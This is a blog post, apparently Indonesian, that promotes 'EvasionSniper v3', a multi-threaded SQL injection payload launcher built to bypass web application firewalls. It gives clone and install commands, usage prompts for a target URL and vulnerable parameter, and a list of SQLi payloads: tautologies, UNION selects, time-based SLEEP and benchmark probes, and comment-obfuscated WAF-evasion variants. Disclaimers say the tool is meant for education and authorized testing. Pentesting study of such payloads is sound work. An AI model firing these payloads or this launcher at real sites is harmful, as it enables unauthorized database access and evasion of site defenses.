[EvasionSniper v3] SQLi Payload Launcher with WAF Bypass

[EvasionSniper v3] SQLi Payload Launcher with WAF Bypass by 0x6ick

0x6ick kembali hadir dengan EvasionSniper v3, tools untuk para pentester brutal yang butuh payload-launcher cepat, multi-thread, dan support bypass WAF bawaan.

⚠️ Disclaimer: This toolsis stricly for educational purposes and authorized penetration testing only. I do not support or condone any illegal hacking activities. .

Fitur Utama

  • Built-in OWASP + Custom Payload Pool
  • Multi-threaded Launcher
  • Randomized Headers & Payload Obfuscation
  • Basic WAF Detection & Auto-switch
  • Auto-save hasil scan (jika >20 payload)
  • Fancy ASCII banner & Colored Output
  • Progress Counter & Friendly Prompt

(Contoh Output)

Instalasi & Clone

git clone https://github.com/6ickzone/EvasionSniper.git

cd EvasionSniper

pip install -r requirements.txt

Opsi Manual (bagi yang tidak bisa clone)

  1. Buka link raw script: https://raw.githubusercontent.com/6ickzone/EvasionSniper/main/main.py ).
  2. Di Termux atau Linux:
  3. curl -s https://raw.githubusercontent.com/6ickzone/EvasionSniper/main/main.py -o main.py
    
    chmod +x main.py
    
    
  4. Pastikan `requirements.txt` terisi:
    requests
    
    colorama
  5. Install dependencies:
    pip install -r requirements.txt

Cara Pakai

python3 main.py

# Lalu isi prompt:

# Enter target URL (e.g., http://site.com/page.php): http://target.com/index.php

# Enter vulnerable param (e.g., id): id

# Threads (default 5): [Enter]

# Custom payload file (optional): payloads.txt

# Save results to file (optional): result.txt

Tools akan otomatis menjalankan multi-threaded payload shots, menandai hasil Passed (200 OK), Blocked (403/406), dan menyimpan ke file jika diperlukan.

Daftar Payload OWASP (SQL Injection Bypassing WAF)

Referensi lengkap & varian tambahan: OWASP SQL Injection Bypassing WAF Cheat Sheet

' OR '1'='1'--

' OR 1=1--

' UNION SELECT NULL--

' OR SLEEP(5)--

' OR benchmark(5000000,MD5(1))--

' OR 2 LIKE 2--

'/**/OR/**/1=1--

'/*!50000UNION*/ SELECT NULL--

...dan masih banyak lagi sesuai OWASP Cheat Sheet...
⚠️ Disclaimer Legal:
This tool is developed solely foreducational and authorized penetration testing only. Any misuse for unauthorized access, hacking, or criminal activities is strictly prohibited.. The author (0x6ick,NyxCode) is not responsible for any consequences arising from unlawful use..

Download & Contribute

👉 Clone atau fork repo di GitHub

Kamu juga bisa fork atau open issue untuk request fitur baru.

Next Update (v4)

– Auto-detect error-based & time-based SQLi
– Dynamic WAF fingerprinting & payload pools
– Progress bar & GUI ringan

Post a Comment

Lebih baru Lebih lama